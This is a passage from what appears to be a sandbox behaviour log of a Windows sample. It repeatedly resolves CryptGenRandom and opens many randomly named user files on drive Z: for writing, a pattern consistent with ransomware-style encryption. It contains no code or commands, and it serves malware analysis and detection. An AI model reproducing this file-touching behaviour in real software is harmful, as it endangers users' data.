| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\sDKhau.doc, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\8qGeXH1kIXTzNAwh1.pptx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\8qGeXH1kIXTzNAwh1.pptx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\991tuWIWnfwOaO.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\991tuWIWnfwOaO.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\LOFKJdnEn4MzMXm.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\LOFKJdnEn4MzMXm.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\RH3IiU0yMrDFNR6DKs.pdf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\RH3IiU0yMrDFNR6DKs.pdf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\iWJTz4KEmPveSMxUQ8.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\iWJTz4KEmPveSMxUQ8.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qU7Og9CaR8xuh.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\qU7Og9CaR8xuh.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\lEAREuPn69.mp4, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\lEAREuPn69.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qnnrT9SEOOv4oMd88.jpg, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\qnnrT9SEOOv4oMd88.jpg, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\eCV9B6Keul.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\eCV9B6Keul.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\pWw3Texk6CwVcTz.odp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\pWw3Texk6CwVcTz.odp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\TkryzlAhWDjxy.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\TkryzlAhWDjxy.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\NXOcFmcZH0kfs1V2.xls, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\NXOcFmcZH0kfs1V2.xls, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\cxc1c8A9xEZm1pp.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\cxc1c8A9xEZm1pp.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\FsFwfuaCG.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\FsFwfuaCG.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\1F9dzJR3Dq.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\1F9dzJR3Dq.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\o4isx.png, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\o4isx.png, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\2XzzHT1hfS0s9l.docx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\2XzzHT1hfS0s9l.docx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\m9asRMP8HoSL6.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\m9asRMP8HoSL6.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\PlmVZkn.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\PlmVZkn.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\D9xhD4Vtl9zeKaqi.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\D9xhD4Vtl9zeKaqi.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\diCHxx1R37p96mJV.ppt, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\diCHxx1R37p96mJV.ppt, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\8KdP1zVgyza2WB4YuYBy.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\8KdP1zVgyza2WB4YuYBy.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9HqwEbX7Ln7H.wav, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\9HqwEbX7Ln7H.wav, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\9ZTbafp.mp3, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\9ZTbafp.mp3, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\EdkUgdunNhUsDwiV5VL.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\EdkUgdunNhUsDwiV5VL.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\RxFoEpC5uC.xlsx, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\RxFoEpC5uC.xlsx, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\sifLLk9MkzE.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\sifLLk9MkzE.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\6dWSrqDXT.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\6dWSrqDXT.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qfhJe21I1iEPfDSocb1f.bmp, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\qfhJe21I1iEPfDSocb1f.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\qmtME3h8QVa74sICzw.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\qmtME3h8QVa74sICzw.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\RaZrRuMAHW1D9.csv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\RaZrRuMAHW1D9.csv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\ZWHKH4ncD.avi, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\ZWHKH4ncD.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\0in5AWEIxKMUstDhHc.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\0in5AWEIxKMUstDhHc.pps, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\LRgNGE3acWIgEa.gif, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\LRgNGE3acWIgEa.gif, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\1ngG8KQUVLO.m4a, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\1ngG8KQUVLO.m4a, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\vhzlvnYmCpbfD.mkv, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\vhzlvnYmCpbfD.mkv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\TWOSOYcL.rtf, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = Z:\TWOSOYcL.rtf, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = Z:\vJvHFLFe.pps, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
